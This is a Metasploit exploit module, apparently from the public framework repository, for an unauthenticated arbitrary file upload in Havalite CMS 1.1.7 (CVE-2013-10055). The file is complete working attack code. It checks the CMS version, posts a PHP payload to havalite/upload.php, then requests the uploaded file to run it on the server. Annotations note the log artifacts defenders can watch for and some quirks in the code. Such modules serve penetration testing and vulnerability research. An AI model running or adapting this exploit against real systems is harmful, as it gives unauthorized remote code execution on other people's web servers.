Path: blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the unauthenticated file upload in Havalite CMS
# (CVE-2013-10055). As written, the module does two HTTP round trips:
# a multipart POST of a PHP file to `havalite/upload.php`, then a GET of
# that file under `havalite/tmp/files/`. Both paths are fixed below and
# are the observable artifacts a web log or WAF rule would key on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata and the single TARGETURI option (base path
  # under which the `havalite/` directory lives; defaults to '/').
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Havalite CMS Arbitary File Upload Vulnerability",
        'Description' => %q{
          This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
          possibly prior. Attackers can abuse the upload feature in order to upload a
          malicious PHP file without authentication, which results in arbitrary remote code
          execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'CWH',
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['CVE', '2013-10055'],
          ['OSVDB', '94405'],
          ['EDB', '26243']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Platform' => %w{linux php},
        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-06-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
      ]
    )
  end

  #
  # Checks if target is running HavaLite CMS 1.1.7
  # We only flag 1.1.7 as vulnerable, because we don't have enough information from
  # the vendor or OSVDB about exactly which ones are really vulnerable.
  #
  # Fingerprinting is passive: a single GET of `havalite/`, then a scan of the
  # first inline <script> block for a `var myVersion = '...'` assignment.
  #
  # @return [Exploit::CheckCode] Unknown when no response arrives, Appears when
  #   the extracted version string contains "1.1.7", Safe otherwise.
  #
  def check
    uri = normalize_uri(target_uri.path, 'havalite/')
    res = send_request_raw({ 'uri' => uri })

    if not res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # /m makes `.+` span newlines, and it is greedy, so on a page with several
    # <script> blocks this capture may run from the first opening tag to the
    # last closing tag. The version regex below still finds `myVersion` inside
    # that larger span, so the result is the same; just don't assume js_src is
    # one script element.
    js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
    version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''

    # `not` binds tighter than `and`, so this reads as
    # (not version.empty?) and (version =~ /1\.1\.7/). The match is a
    # substring match, so e.g. "1.1.7.1" would also be flagged.
    if not version.empty? and version =~ /1\.1\.7/
      vprint_status("Version found: #{version}")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  #
  # Uploads our malicious file
  #
  # Sends one multipart/form-data POST to `<base>/havalite/upload.php` with a
  # single part named `files[]` whose filename is five random alpha characters
  # plus `.php`. No credentials or session cookie are sent, which is the
  # unauthenticated condition the advisory describes.
  #
  # @param base [String] TARGETURI path the `havalite/` directory hangs off
  # @return [String] the generated filename (the caller needs it to request
  #   the file back)
  # @raise via fail_with on no response, on a 404 for upload.php, or when the
  #   JSON body reports `"error":"abort"` (treated as write failure)
  #
  def upload(base)
    # :unlink_self is an option of the PhpEXE mixin's payload builder; from this
    # file alone it looks like it asks the dropped script to remove itself once
    # it has run — confirm against Msf::Exploit::PhpEXE before relying on it
    # for cleanup.
    p = get_write_exec_payload(:unlink_self => true)
    fname = "#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(base, 'havalite', 'upload.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    # NOTE(review): here the status is compared via `res.code.to_i`, while
    # exec() below compares `res.code` directly; the two should agree on
    # whether code is already an Integer.
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    elsif res.body =~ /"error"\:"abort"/
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    end

    return fname
  end

  #
  # Executes our uploaded malicious file
  #
  # Requests `<base>/havalite/tmp/files/<payload_fname>` once. Only a 404 is
  # treated as failure; a nil response (timeout) is silently accepted, which
  # matches a payload that never returns a normal HTTP reply.
  #
  # Note this method name shadows Kernel#exec inside the module; that is the
  # framework's convention here, not a call to the system exec.
  #
  # @param base [String] TARGETURI path
  # @param payload_fname [String] filename returned by #upload
  # @raise via fail_with(Failure::NotFound) on HTTP 404
  #
  def exec(base, payload_fname)
    res = send_request_raw({
      'uri' => normalize_uri(base, 'havalite', 'tmp', 'files', payload_fname)
    })

    if res and res.code == 404
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
    end
  end

  # Framework entry point: upload, then request the uploaded file.
  def exploit
    base = target_uri.path

    print_status("Uploading malicious file...")
    fname = upload(base)

    print_status("Executing #{fname}...")
    exec(base, fname)
  end
end